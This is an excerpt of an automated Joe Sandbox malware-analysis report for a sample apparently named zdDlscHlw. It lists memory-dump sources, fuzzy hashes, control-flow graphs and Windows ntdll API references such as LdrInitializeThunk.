                                                • Opcode Fuzzy Hash: 27c8a3ea98f256ad81cb6109b0ac242dc3e736ec387b77ac46a7d19405d15108
                                                • Instruction Fuzzy Hash: ECC08C343103080BDB0822F2A40E72A7ACAABC4A21F108424B80A87385EE328801D729
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1587c1382773fa8cdff5fc50e78c08a0c9ee524b3f4b76799f9a90c4c1c85b74
                                                • Instruction ID: 093e648c1b8388ed27557eefcae4d48d81a8f8e5bbc7600e4393eea3e771f7c9
                                                • Opcode Fuzzy Hash: 1587c1382773fa8cdff5fc50e78c08a0c9ee524b3f4b76799f9a90c4c1c85b74
                                                • Instruction Fuzzy Hash: 90B09B3171513957D544319D74105DD72CF8786561F4000B7A50E977419CD59C4103E9
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 242b322b6df9872f329b177d0570b9d828dc86a0a29dd9ff9ca18139aceec663
                                                • Instruction ID: 0731274617b68b4286f6f987366c3574bdf7dfee002b61400310757a6eb4a932
                                                • Opcode Fuzzy Hash: 242b322b6df9872f329b177d0570b9d828dc86a0a29dd9ff9ca18139aceec663
                                                • Instruction Fuzzy Hash: CEC09B357855048FFB5D59D4E90E7D03D97D3C1311F648125B543871C6CD6D45059745
                                                Memory Dump Source
                                                • Source File: 0000000A.00000002.1820494545.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_10_2_5db0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 82c4b35a944df5015824134df7f9f66fad35828ca857086779558481c2bbd204
                                                • Instruction ID: b6ba558a3b767693f5a6b00a9b54b079d1ca59d74ab826e14c1d568735c43ab5
                                                • Opcode Fuzzy Hash: 82c4b35a944df5015824134df7f9f66fad35828ca857086779558481c2bbd204
                                                • Instruction Fuzzy Hash: BCB09225258342E2660063684CE6A9A6822EBA6B01B808C17A24A0000185A1842CE62B

                                                Execution Graph

                                                Execution Coverage:0.1%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:5
                                                Total number of Limit Nodes:1
                                                execution_graph 62716 1452df0 LdrInitializeThunk 62717 1452c00 62719 1452c0a 62717->62719 62720 1452c11 62719->62720 62721 1452c1f LdrInitializeThunk 62719->62721

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 1452c0a-1452c0f 1 1452c11-1452c18 0->1 2 1452c1f-1452c26 LdrInitializeThunk 0->2
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0146FD4F,000000FF,00000024,01506634,00000004,00000000,?,-00000018,7D810F61,?,?,01428B12,?,?,?,?), ref: 01452C24
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
                                                • Instruction ID: 50992192b305ff3528651dfe7f87b06346117b078d8ee56506c7cd7c8e7fe88f
                                                • Opcode Fuzzy Hash: 3ea2f2df63bec2df8ad88c2789c2fa908cb49d7db8661fadef020ced1b22c93b
                                                • Instruction Fuzzy Hash: CAB09BB19015C5C5DB52E7644608B1B7A0477D0705F15C063D7030653F4778C1D1E276

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 4 1452df0-1452dfc LdrInitializeThunk
                                                APIs
                                                • LdrInitializeThunk.NTDLL(0148E73E,0000005A,014ED040,00000020,00000000,014ED040,00000080,01474A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0145AE00), ref: 01452DFA
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
                                                • Instruction ID: c8116c9872de0c67db5ad6d0c23528e9601cf2ebf2d3c05170d94e840a021bbb
                                                • Opcode Fuzzy Hash: fd3802c29216df61fa2ead2bc1e43048f56c76d12dbcbf78a56c8c28a2bcaa1b
                                                • Instruction Fuzzy Hash: 019002B120150513D1117158450470B010D97E0245F95C413A4424559DD7668A52A222

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 5 14535c0-14535cc LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
                                                • Instruction ID: 0942d6edea510284d8d7094049b8d213bb93496acc2206cf86893c59d787cb90
                                                • Opcode Fuzzy Hash: fa04dfdf537a1659b0faae2f2893374d2cf7f4ba56f42dd85fba72dbeb256b46
                                                • Instruction Fuzzy Hash: 979002B160560502D1007158451470A110997E0205F65C412A4424569DC7A58A5166A3

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 42e8a4-42e8a6 7 42e8a8-42e8ad 6->7 8 42e86f-42e871 6->8 11 42e8ff-42e906 7->11 12 42e8af-42e8b2 7->12 9 42e873-42e87b 8->9 10 42e8c1-42e8de 8->10 14 42e893-42e896 9->14 15 42e87d-42e885 9->15 18 42e8df 10->18 17 42e909-42e931 11->17 16 42e8b4-42e8de 12->16 12->17 15->14 19 42e887-42e891 15->19 16->18 24 42e933-42e936 17->24 25 42e937-42e941 17->25 20 42e8e4-42e8f5 18->20 19->14 21 42e897-42e89d 19->21 21->14 23 42e89f-42e8a3 21->23
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25a5e6b8e6ff9c72c320d1583783e05ec00dab4a00ff22782d81fc44293978c5
                                                • Instruction ID: 51db822ec13e8ab98872101987603bdf61165c67e5fd0f667f39fca90ca4d4ee
                                                • Opcode Fuzzy Hash: 25a5e6b8e6ff9c72c320d1583783e05ec00dab4a00ff22782d81fc44293978c5
                                                • Instruction Fuzzy Hash: D02195B1610209AFDB00DF96DC81EEB37A9EB88710F44856AF9188B341E674E950CBA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 38 42e4f3-42e534 call 42e9e3 42 42e536-42e553 38->42 43 42e58e-42e593 38->43 45 42e566-42e58b 42->45 46 42e555-42e55d 42->46 45->43 48 42e563 46->48 48->45
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86d152cfd755bf89d7b19b803edcd056883acbb0f726a688dc7236ef142aa53e
                                                • Instruction ID: 6536ffcc9c3b0048ebaa90428f329d9984c0ca0239fb8df35c6df5a0615c4489
                                                • Opcode Fuzzy Hash: 86d152cfd755bf89d7b19b803edcd056883acbb0f726a688dc7236ef142aa53e
                                                • Instruction Fuzzy Hash: F30188B1E0021866EB60EB969C42FDDB7B89B08304F440ADAF50CA2581FF7497CC8F95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 26 42e4f1-42e50a 27 42e519-42e520 26->27 28 42e514 call 42e9e3 26->28 29 42e52f-42e534 27->29 28->27 30 42e536-42e53f 29->30 31 42e58e-42e593 29->31 32 42e54e-42e553 30->32 33 42e566-42e58b 32->33 34 42e555-42e55d 32->34 33->31 36 42e563 34->36 36->33
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d5fff53844ad7635d14ce47dfaaa7d2cb153b7462868a25b6143d9e021cdeaac
                                                • Instruction ID: e3a7b402a86e856c6b7230859ae608618436a70a277da39832eaf962ff5f8136
                                                • Opcode Fuzzy Hash: d5fff53844ad7635d14ce47dfaaa7d2cb153b7462868a25b6143d9e021cdeaac
                                                • Instruction Fuzzy Hash: 4B0152B1E4021866EB60EBA59C42FDDB7B89B08314F440ADAF50CA6581FF7497CC8F95

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 50 42e86a-42e86b 51 42e8df 50->51 52 42e86d-42e871 50->52 55 42e8e4-42e8f5 51->55 53 42e873-42e87b 52->53 54 42e8c1-42e8de 52->54 56 42e893-42e896 53->56 57 42e87d-42e885 53->57 54->51 57->56 58 42e887-42e891 57->58 58->56 59 42e897-42e89d 58->59 59->56 60 42e89f-42e8a3 59->60
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 69968d297eeab42c0527e52a92b0eb89c8de6e57ecedec53052c9ed9b61f21a7
                                                • Instruction ID: 8330654274930f62e300c394a12d87f98bb8e1057f388f223c9a356a065d7175
                                                • Opcode Fuzzy Hash: 69968d297eeab42c0527e52a92b0eb89c8de6e57ecedec53052c9ed9b61f21a7
                                                • Instruction Fuzzy Hash: 37F0C831B102089BDB04DF96EC84EF777A9EB44B10F44867AF5288B381DB78D9408B98

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 61 42ea19-42ea22 62 42ea23-42ea35 61->62 63 42ea3b-42ea42 62->63 64 42ea56-42ea59 63->64 65 42ea44-42ea46 63->65 65->64 66 42ea48-42ea54 call 42e9e3 65->66 66->64
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9521045b9953a7869eb17ba25c434d5dd5f962ed822bcf72c46946d0779b3ac6
                                                • Instruction ID: a8252fb9b6d72e90fff88e9f32f5a80d5f9592f42a5706108b645749e0bc429c
                                                • Opcode Fuzzy Hash: 9521045b9953a7869eb17ba25c434d5dd5f962ed822bcf72c46946d0779b3ac6
                                                • Instruction Fuzzy Hash: 3EE09B72B0132436D231555AAD06F5BBB9D9BC1BA0F45015AFA085B341D6B4A90082E9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 72 42ea23-42ea35 73 42ea3b-42ea42 72->73 74 42ea56-42ea59 73->74 75 42ea44-42ea46 73->75 75->74 76 42ea48-42ea54 call 42e9e3 75->76 76->74
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 128419e31778370a2d0008fced28356bc7056254cd3877fc37f26048c4ce46ac
                                                • Instruction ID: bb7e46f97b8a1781468baf4f8ce71fc5d6662707fe6c93a67366e14e3de2d2c8
                                                • Opcode Fuzzy Hash: 128419e31778370a2d0008fced28356bc7056254cd3877fc37f26048c4ce46ac
                                                • Instruction Fuzzy Hash: FDE04F32B0022427C230559AAC06F5B776D9BC1BA0F45012AFE089B341E568E90082E9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 69 42e8b3-42e8df 71 42e8e4-42e8f5 69->71
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b53033de2d7a938e869628bd6b5d934c86ac0b790f9ebf02f7026811248c3f55
                                                • Instruction ID: 3f562ab833bb2e85ce3dd99096867104a18e3ce9b08c5f767f10bd9300a0e1f9
                                                • Opcode Fuzzy Hash: b53033de2d7a938e869628bd6b5d934c86ac0b790f9ebf02f7026811248c3f55
                                                • Instruction Fuzzy Hash: E7F098B6610209AFDB04CF59D885EDA73A9AB88750F048559BD198B241DB74EA508BA0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 79 42e943-42e953 80 42e959-42e95d 79->80
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2003363916.000000000042E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0042E000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_42e000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 71ec17ad8cd1b1084e609cf5749805a1698b2b259e64900bef593647b60697db
                                                • Instruction ID: 8450f38e604265a99eb0e3d55bcf5a836d15afe0aba1383b58b56268d4c61a2c
                                                • Opcode Fuzzy Hash: 71ec17ad8cd1b1084e609cf5749805a1698b2b259e64900bef593647b60697db
                                                • Instruction Fuzzy Hash: ECC08CB26403087FEB04EE8CEC87F2B37AC9B08624F404045BA0CCB382E570F91087A9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 81 1454a80-1454a8b 82 1454a8d-1454a99 RtlDebugPrintTimes 81->82 83 1454a9f-1454aa6 81->83 82->83 88 1454b25-1454b26 82->88 84 1454aaf-1454ab6 call 143f5a0 83->84 85 1454aa8-1454aae 83->85 90 1454b23 84->90 91 1454ab8-1454b22 call 1441e46 * 2 84->91 90->88 91->90
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: DebugPrintTimes
                                                • String ID: 0IFw$0IFw$0IFw$0IFw$0IFw$0IFw
                                                • API String ID: 3446177414-1820880178
                                                • Opcode ID: d7e37350875a04da4037222af428dafe38bd793a1b3300b687acd61b114d8d95
                                                • Instruction ID: 61094fe6bc39f9824c6f3410b7ae800f9916be73d59744a47512667b3fa69e62
                                                • Opcode Fuzzy Hash: d7e37350875a04da4037222af428dafe38bd793a1b3300b687acd61b114d8d95
                                                • Instruction Fuzzy Hash: 9701C072E051005ADB62DAA878147872AD1B3C8728F0A045AE91C8F2EFE3704C89E790

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 292 1452890-14528b3 293 148a4bc-148a4c0 292->293 294 14528b9-14528cc 292->294 293->294 295 148a4c6-148a4ca 293->295 296 14528dd-14528df 294->296 297 14528ce-14528d7 294->297 295->294 298 148a4d0-148a4d4 295->298 300 14528e1-14528e5 296->300 297->296 299 148a57e-148a585 297->299 298->294 301 148a4da-148a4de 298->301 299->296 302 1452988-145298e 300->302 303 14528eb-14528fa 300->303 301->294 304 148a4e4-148a4eb 301->304 307 1452908-145290c 302->307 305 148a58a-148a58d 303->305 306 1452900-1452905 303->306 308 148a4ed-148a4f4 304->308 309 148a564-148a56c 304->309 305->307 306->307 307->300 310 145290e-145291b 307->310 312 148a50b 308->312 313 148a4f6-148a4fe 308->313 309->294 311 148a572-148a576 309->311 314 1452921 310->314 315 148a592-148a599 310->315 311->294 316 148a57c call 1460050 311->316 318 148a510-148a536 call 1460050 312->318 313->294 317 148a504-148a509 313->317 319 1452924-1452926 314->319 321 148a5a1-148a5c9 call 1460050 315->321 334 148a55d-148a55f 316->334 317->318 318->334 323 1452993-1452995 319->323 324 1452928-145292a 319->324 323->324 328 1452997-14529b1 call 1460050 323->328 329 1452946-1452966 call 1460050 324->329 330 145292c-145292e 324->330 342 1452969-1452974 328->342 329->342 330->329 331 1452930-1452944 call 1460050 330->331 331->329 340 1452981-1452985 334->340 342->319 343 1452976-1452979 342->343 343->321 344 145297f 343->344 344->340
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID:
                                                • API String ID: 48624451-0
                                                • Opcode ID: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
                                                • Instruction ID: 5b8e4ae5fc4f2d5e7c0b785f7fd161069bfccb5786d79225ab637780973052c5
                                                • Opcode Fuzzy Hash: 0aa8ece54bceae78b9bef48d26a1aa69e066645d8593dae2f5258cae25f02660
                                                • Instruction Fuzzy Hash: A351F6B6A00116BFCB51DF9D888097FFBB8BB08244714822BE865D7752D3B4DE4087A0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 345 142a250-142a26f 346 142a275-142a291 345->346 347 142a58d-142a594 345->347 348 14779e6-14779eb 346->348 349 142a297-142a2a0 346->349 347->346 350 142a59a-14779bb 347->350 349->348 351 142a2a6-142a2ac 349->351 350->346 355 14779c1-14779c6 350->355 353 142a2b2-142a2b4 351->353 354 142a6ba-142a6bc 351->354 353->348 357 142a2ba-142a2bd 353->357 356 142a6c2 354->356 354->357 358 142a473-142a479 355->358 359 142a2c3-142a2c6 356->359 357->348 357->359 360 142a2da-142a2dd 359->360 361 142a2c8-142a2d1 359->361 364 142a2e3-142a32b 360->364 365 142a6c7-142a6d0 360->365 362 142a2d7 361->362 363 14779cb-14779d5 361->363 362->360 367 14779da-14779e3 call 149f290 363->367 368 142a330-142a335 364->368 365->364 366 142a6d6-14779ff 365->366 366->367 367->348 371 142a33b-142a343 368->371 372 142a47c-142a47f 368->372 374 142a34f-142a35d 371->374 376 142a345-142a349 371->376 373 142a485-142a488 372->373 372->374 378 142a48e-142a49e 373->378 379 1477a16-1477a19 373->379 377 142a363-142a368 374->377 374->378 376->374 380 142a59f-142a5a8 376->380 381 142a36c-142a36e 377->381 378->379 383 142a4a4-142a4ad 378->383 379->381 382 1477a1f-1477a24 379->382 384 142a5c0-142a5c3 380->384 385 142a5aa-142a5ac 380->385 388 1477a26 381->388 389 142a374-142a38c call 142a6e0 381->389 390 1477a2b 382->390 383->381 386 1477a01 384->386 387 142a5c9-142a5cc 384->387 385->374 391 142a5b2-142a5bb 385->391 393 1477a0c 386->393 392 142a5d2-142a5d5 387->392 387->393 388->390 398 142a4b2-142a4b9 389->398 399 142a392-142a3ba 389->399 395 1477a2d-1477a2f 390->395 391->381 392->385 393->379 395->358 397 1477a35 395->397 400 142a3bc-142a3be 398->400 401 142a4bf-142a4c2 398->401 399->400 400->395 402 142a3c4-142a3cb 400->402 401->400 403 142a4c8-142a4d3 401->403 404 142a3d1-142a3d4 402->404 405 1477ae0 402->405 403->368 406 142a3e0-142a3ea 404->406 407 1477ae4-1477afc call 149f290 405->407 406->407 408 142a3f0-142a40c call 142a840 406->408 407->358 413 142a412-142a417 408->413 414 142a5d7-142a5e0 408->414 413->358 415 142a419-142a43d 413->415 416 142a5e2-142a5eb 414->416 417 142a601-142a603 414->417 418 142a440-142a443 415->418 416->417 419 142a5ed-142a5f1 416->419 420 142a605-142a623 call 1414508 417->420 421 142a629-142a631 417->421 422 142a4d8-142a4dc 418->422 423 142a449-142a44c 418->423 424 142a681-142a6ab RtlDebugPrintTimes 419->424 425 142a5f7-142a5fb 419->425 420->358 420->421 430 142a4e2-142a4e5 422->430 431 1477a3a-1477a42 422->431 427 142a452-142a454 423->427 428 1477ad6 423->428 424->417 439 142a6b1-142a6b5 424->439 425->417 425->424 433 142a520-142a539 call 142a6e0 427->433 434 142a45a-142a461 427->434 428->405 435 142a634-142a64a 430->435 437 142a4eb-142a4ee 430->437 431->435 436 1477a48-1477a4c 431->436 451 142a65e-142a665 433->451 452 142a53f-142a567 433->452 440 142a467-142a46c 434->440 441 142a57b-142a582 434->441 442 142a650-142a659 435->442 443 142a4f4-142a50c 435->443 436->435 444 1477a52-1477a5b 436->444 437->423 437->443 439->417 440->358 447 142a46e 440->447 441->406 448 142a588 441->448 442->427 443->423 445 142a512-142a51b 443->445 449 1477a85-1477a87 444->449 450 1477a5d-1477a60 444->450 445->427 447->358 448->405 449->435 453 1477a8d-1477a96 449->453 454 1477a62-1477a6c 450->454 455 1477a6e-1477a71 450->455 458 142a569-142a56b 451->458 459 142a66b-142a66e 451->459 452->458 453->427 460 1477a81 454->460 456 1477a73-1477a7c 455->456 457 1477a7e 455->457 456->453 457->460 458->440 461 142a571-142a573 458->461 459->458 462 142a674-142a67c 459->462 460->449 463 142a579 461->463 464 1477a9b-1477aa4 461->464 462->418 463->441 464->463 465 1477aaa-1477ab0 464->465 465->463 466 1477ab6-1477abe 465->466 466->463 467 1477ac4-1477acf 466->467 467->466 468 1477ad1 467->468 468->463
                                                Strings
                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014779D5
                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 014779D0, 014779F5
                                                • SsHd, xrefs: 0142A3E4
                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014779FA
                                                Memory Dump Source
                                                • Source File: 0000000F.00000002.2004078789.0000000001406000.00000040.00001000.00020000.00000000.sdmp, Offset: 013E0000, based on PE: true
                                                • Associated: 0000000F.00000002.2004078789.00000000013E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000013E7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001460000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001466000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.00000000014A2000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001503000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 0000000F.00000002.2004078789.0000000001509000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_15_2_13e0000_zdDlscHlw.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                • API String ID: 0-929470617
                                                • Opcode ID: 104e8fb2a21a495119319d6d49d5e1b0a3d209c47ceb2bf22be1741f416b6388
                                                • Instruction ID: 5cae79c3cd96a9c9d0643051faf61e14c3ae4807be8622e59a18894d7a936927
                                                • Opcode Fuzzy Hash: 104e8fb2a21a495119319d6d49d5e1b0a3d209c47ceb2bf22be1741f416b6388
                                                • Instruction Fuzzy Hash: C7E1D5706043118FE725CE28C888B6BBBE1BB84254FA44A2FED95CB7A1D771D9C5CB41

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
